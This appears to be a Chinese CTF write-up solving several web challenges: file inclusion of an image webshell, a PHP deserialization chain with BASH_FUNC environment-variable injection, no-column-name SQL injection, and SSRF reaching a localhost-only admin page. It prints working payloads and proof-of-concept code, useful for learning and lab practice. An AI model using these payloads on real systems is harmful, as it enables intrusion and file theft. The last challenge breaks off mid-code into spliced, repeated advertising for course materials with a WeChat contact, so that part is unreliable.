文章目录
- 1. 100%_upload(文件上传、文件包含)
- 2. Not just unserialize(反序列化、环境变量注入)
- 3. hacker(无列名注入)
- 4. EZ_SSRF(SSRF)
- 5. Oyst3rPHP(md5、preg_match、TP6反序列化POP)
- 6. elInjection
文笔有限,大佬轻喷。
1. 100%_upload(文件上传、文件包含)
很多解法,这里采用文件包含图片马GETSHELL,观察URL构成,可以看到GET参数file,可能存在文件包含。验证之:
/index.php?file=/etc/passwd
上传图片马,发现存在文件内容检测。
使用短标签绕过。
响应包中返回了文件路径,配合文件包含利用。
后续省略。
2. Not just unserialize(反序列化、环境变量注入)
源码如下:
<?php
highlight\_file(\_\_FILE\_\_);
class start
{
public $welcome;
public $you;
public function \_\_destruct()
{
$this->begin0fweb();
}
public function begin0fweb()
{
$p='hacker!';
$this->welcome->you = $p;
}
}
class SE{
public $year;
public function \_\_set($name, $value){
echo ' Welcome to new year! ';
echo($this->year);
}
}
class CR {
public $last;
public $newyear;
public function \_\_tostring() {
if (is\_array($this->newyear)) {
echo 'nonono';
return false;
}
if (!preg\_match('/worries/i',$this->newyear))
{
echo "empty it!";
return 0;
}
if(preg\_match('/^.\*(worries).\*$/',$this->newyear)) {
echo 'Don\'t be worry';
} else {
echo 'Worries doesn\'t exists in the new year ';
empty($this->last->worries);
}
return false;
}
}
class ET{
public function \_\_isset($name)
{
foreach ($\_GET['get'] as $inject => $rce){
putenv("{$inject}={$rce}");
}
system("echo \"Haven't you get the secret?\"");
}
}
if(isset($\_REQUEST['go'])){
unserialize(base64\_decode($\_REQUEST['go']));
}
?>
POC:
<?php
class start{
public $welcome;
function \_\_construct(){
$this->welcome = new SE;
}
}
class SE{
public $year;
function \_\_construct(){
$this->year=new CR;
}
}
class CR{
public $last;
public $newyear = "\nworries";
function \_\_construct(){
$this->last = new ET;
}
}
class ET{
}
echo base64\_encode(serialize(new start));
?>
关键代码:
public function \_\_isset($name)
{
foreach ($\_GET['get'] as $inject => $rce){
putenv("{$inject}={$rce}");
}
system("echo \"Haven't you get the secret?\"");
}
涉及环境变量注入,参考P神博客:环境变量注入
Payload:
?go=Tzo1OiJzdGFydCI6MTp7czo3OiJ3ZWxjb21lIjtPOjI6IlNFIjoxOntzOjQ6InllYXIiO086MjoiQ1IiOjI6e3M6NDoibGFzdCI7TzoyOiJFVCI6MDp7fXM6NzoibmV3eWVhciI7czo4OiIKd29ycmllcyI7fX19&get[BASH_FUNC_echo%25%25]=()%20{%20cat%20/ffffllllllaaaaaaaaaaaaaaaaaaggggg;%20}
3. hacker(无列名注入)
考点是SQL注入,过滤了information_schemta,考虑无列名注入。
Payload:
?username=1.1'/**/union/**/select/**/group_concat(`2`)/**/from/**/(select/**/1,2/**/union/**/select/**/*/**/from/**/flag)a%23
4. EZ_SSRF(SSRF)
<?php
highlight\_file(__file__);
error\_reporting(0);
function get($url) {
$curl = curl\_init();
curl\_setopt($curl, CURLOPT\_URL, $url);
curl\_setopt($curl, CURLOPT\_HEADER, 0);
curl\_setopt($curl, CURLOPT\_RETURNTRANSFER, true);
$data = curl\_exec($curl);
curl\_close($curl);
echo base64\_encode($data);
return $data;
}
class client{
public $url;
public $payload;
public function \_\_construct()
{
$url = "http://127.0.0.1/";
$payload = "system(\"cat /flag\");";
echo "Exploit";
}
public function \_\_destruct()
{
get($this->url);
}
}
// hint:hide other file
if(isset($\_GET['Harder'])) {
unserialize($\_GET['Harder']);
} else {
echo "You don't know how to pass parameters?";
}
?>
回显型SSRF,直接包含/flag没有内容。根据hint:hide other file,扫描了一波目录,还存在admin.php和flag.php,admin.php内容如下:
<?php
error\_reporting(0);
include "flag.php";
highlight\_file(\_\_FILE\_\_);
$allowed\_ip = "127.0.0.1";
if ($\_SERVER['REMOTE\_ADDR'] !== $allowed\_ip) {
die("You can't get flag");
} else {
echo $flag;
}
?>
可以得知,当$_SERVER['REMOTE_ADDR']的值等于127.0.0.1时,就输出flag,但是$_SERVER['REMOTE_ADDR']是不可伪造的。此时我们可以借助SSRF,将目标靶机作为跳板机,访问/admin.php文件。
POC:
<?php
class client{
public $url = "http://127.0.0.1/admin.php";
}
echo serialize(new client);
?>
成功获取到flag。
5. Oyst3rPHP(md5、preg_match、TP6反序列化POP)
根据favicon.io得知是ThinkPHP,先拿TP漏扫工具一把梭,无果。扫描目录发现存在www.zip文件。
拿到app\controller\Index.php文件内容:
<?php
namespace app\controller;
use app\BaseController;
class Index extends BaseController
{
public function index(){
echo "RT,一个很简单的Web,给大家送一点分,再送三只生蚝,过年一起吃生蚝哈";
echo "<img src='../Oyster.png'"." />";
$payload = base64\_decode(@$\_POST['payload']);
$right = @$\_GET['left'];
$left = @$\_GET['right'];
$key = (string)@$\_POST['key'];
if($right != $left && md5($right) == md5($left)){
echo "Congratulations on getting your first oyster";
echo "<img src='../Oyster1.png'"." />";
**自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。**
**深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!**
**因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。**
**既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点,真正体系化!**
**由于文件比较大,这里只是将部分目录大纲截图出来,每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频,并且后续会持续更新**
**如果你觉得这些内容对你有帮助,可以添加VX:vip204888 (备注网络安全获取)**
还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!
王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。
对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!
【完整版领取方式在文末!!】
***93道网络安全面试题***
内容实在太多,不一一截图了
### 黑客学习资源推荐
最后给大家分享一份全套的网络安全学习资料,给那些想学习 网络安全的小伙伴们一点帮助!
对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。
😝朋友们如果有需要的话,可以联系领取~
#### 1️⃣零基础入门
##### ① 学习路线
对于从来没有接触过网络安全的同学,我们帮你准备了详细的**学习成长路线图**。可以说是**最科学最系统的学习路线**,大家跟着这个大的方向学习准没问题。
##### ② 路线对应学习视频
同时每个成长路线对应的板块都有配套的视频提供:
#### 2️⃣视频配套工具&国内外网安书籍、文档
##### ① 工具
##### ② 视频
##### ③ 书籍
资源较为敏感,未展示全面,需要的最下面获取
##### ② 简历模板
**因篇幅有限,资料较为敏感仅展示部分资料,添加上方即可获取👆**
**一个人可以走的很快,但一群人才能走的更远。不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎扫码加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!**
f9ac066e8c485f8407a99619f9c5b5.png#pic_center)
##### ② 简历模板
**因篇幅有限,资料较为敏感仅展示部分资料,添加上方即可获取👆**
**一个人可以走的很快,但一群人才能走的更远。不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎扫码加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!**
[外链图片转存中...(img-UN2V2xiu-1713072982705)]
扫一扫
558
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
